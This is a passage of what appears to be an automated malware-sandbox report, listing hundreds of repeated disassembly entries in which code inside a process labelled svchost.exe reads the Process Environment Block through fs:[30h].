Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C80A8 mov eax, dword ptr fs:[00000030h]	2_2_030C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F60B8 mov eax, dword ptr fs:[00000030h]	2_2_030F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_030F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B20DE mov eax, dword ptr fs:[00000030h]	2_2_030B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0302A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030380E9 mov eax, dword ptr fs:[00000030h]	2_2_030380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B60E0 mov eax, dword ptr fs:[00000030h]	2_2_030B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0302C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030720F0 mov ecx, dword ptr fs:[00000030h]	2_2_030720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C700 mov eax, dword ptr fs:[00000030h]	2_2_0306C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030710 mov eax, dword ptr fs:[00000030h]	2_2_03030710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03060710 mov eax, dword ptr fs:[00000030h]	2_2_03060710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]	2_2_0306C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]	2_2_0306C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]	2_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306273C mov ecx, dword ptr fs:[00000030h]	2_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]	2_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AC730 mov eax, dword ptr fs:[00000030h]	2_2_030AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306674D mov esi, dword ptr fs:[00000030h]	2_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]	2_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]	2_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030750 mov eax, dword ptr fs:[00000030h]	2_2_03030750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BE75D mov eax, dword ptr fs:[00000030h]	2_2_030BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]	2_2_03072750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]	2_2_03072750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B4755 mov eax, dword ptr fs:[00000030h]	2_2_030B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038770 mov eax, dword ptr fs:[00000030h]	2_2_03038770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D678E mov eax, dword ptr fs:[00000030h]	2_2_030D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030307AF mov eax, dword ptr fs:[00000030h]	2_2_030307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E47A0 mov eax, dword ptr fs:[00000030h]	2_2_030E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0303C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B07C3 mov eax, dword ptr fs:[00000030h]	2_2_030B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]	2_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]	2_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]	2_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_030BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]	2_2_030347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]	2_2_030347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE609 mov eax, dword ptr fs:[00000030h]	2_2_030AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072619 mov eax, dword ptr fs:[00000030h]	2_2_03072619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E627 mov eax, dword ptr fs:[00000030h]	2_2_0304E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03066620 mov eax, dword ptr fs:[00000030h]	2_2_03066620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03068620 mov eax, dword ptr fs:[00000030h]	2_2_03068620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303262C mov eax, dword ptr fs:[00000030h]	2_2_0303262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304C640 mov eax, dword ptr fs:[00000030h]	2_2_0304C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]	2_2_030F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]	2_2_030F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]	2_2_0306A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]	2_2_0306A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03062674 mov eax, dword ptr fs:[00000030h]	2_2_03062674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]	2_2_03034690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]	2_2_03034690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0306C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030666B0 mov eax, dword ptr fs:[00000030h]	2_2_030666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0306A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0306A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]	2_2_030B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]	2_2_030B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C6500 mov eax, dword ptr fs:[00000030h]	2_2_030C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]	2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]	2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]	2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]	2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]	2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]	2_2_03038550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]	2_2_03038550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]	2_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]	2_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]	2_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03032582 mov eax, dword ptr fs:[00000030h]	2_2_03032582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03032582 mov ecx, dword ptr fs:[00000030h]	2_2_03032582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03064588 mov eax, dword ptr fs:[00000030h]	2_2_03064588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E59C mov eax, dword ptr fs:[00000030h]	2_2_0306E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]	2_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]	2_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]	2_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]	2_2_030545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]	2_2_030545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]	2_2_0306E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]	2_2_0306E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030365D0 mov eax, dword ptr fs:[00000030h]	2_2_030365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0306A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0306A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030325E0 mov eax, dword ptr fs:[00000030h]	2_2_030325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]	2_2_0306C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]	2_2_0306C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]	2_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]	2_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]	2_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]	2_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]	2_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]	2_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302C427 mov eax, dword ptr fs:[00000030h]	2_2_0302C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A430 mov eax, dword ptr fs:[00000030h]	2_2_0306A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EA456 mov eax, dword ptr fs:[00000030h]	2_2_030EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302645D mov eax, dword ptr fs:[00000030h]	2_2_0302645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305245A mov eax, dword ptr fs:[00000030h]	2_2_0305245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BC460 mov ecx, dword ptr fs:[00000030h]	2_2_030BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]	2_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]	2_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]	2_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EA49A mov eax, dword ptr fs:[00000030h]	2_2_030EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030364AB mov eax, dword ptr fs:[00000030h]	2_2_030364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030644B0 mov ecx, dword ptr fs:[00000030h]	2_2_030644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_030BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030304E5 mov ecx, dword ptr fs:[00000030h]	2_2_030304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]	2_2_0305EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]	2_2_0305EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]	2_2_030F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]	2_2_030F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h]	2_2_030E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h]	2_2_030E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h]	2_2_030C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h]	2_2_030C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FAB40 mov eax, dword ptr fs:[00000030h]	2_2_030FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D8B42 mov eax, dword ptr fs:[00000030h]	2_2_030D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DEB50 mov eax, dword ptr fs:[00000030h]	2_2_030DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302CB7E mov eax, dword ptr fs:[00000030h]	2_2_0302CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h]	2_2_03040BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h]	2_2_03040BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_030E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_030E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]	2_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]	2_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]	2_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]	2_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]	2_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]	2_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_030DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]	2_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]	2_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]	2_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305EBFC mov eax, dword ptr fs:[00000030h]	2_2_0305EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_030BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BCA11 mov eax, dword ptr fs:[00000030h]	2_2_030BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306CA24 mov eax, dword ptr fs:[00000030h]	2_2_0306CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305EA2E mov eax, dword ptr fs:[00000030h]	2_2_0305EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h]	2_2_03054A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h]	2_2_03054A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306CA38 mov eax, dword ptr fs:[00000030h]	2_2_0306CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h]	2_2_03040A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h]	2_2_03040A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]	2_2_0306CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]	2_2_0306CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]	2_2_0306CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DEA60 mov eax, dword ptr fs:[00000030h]	2_2_030DEA60
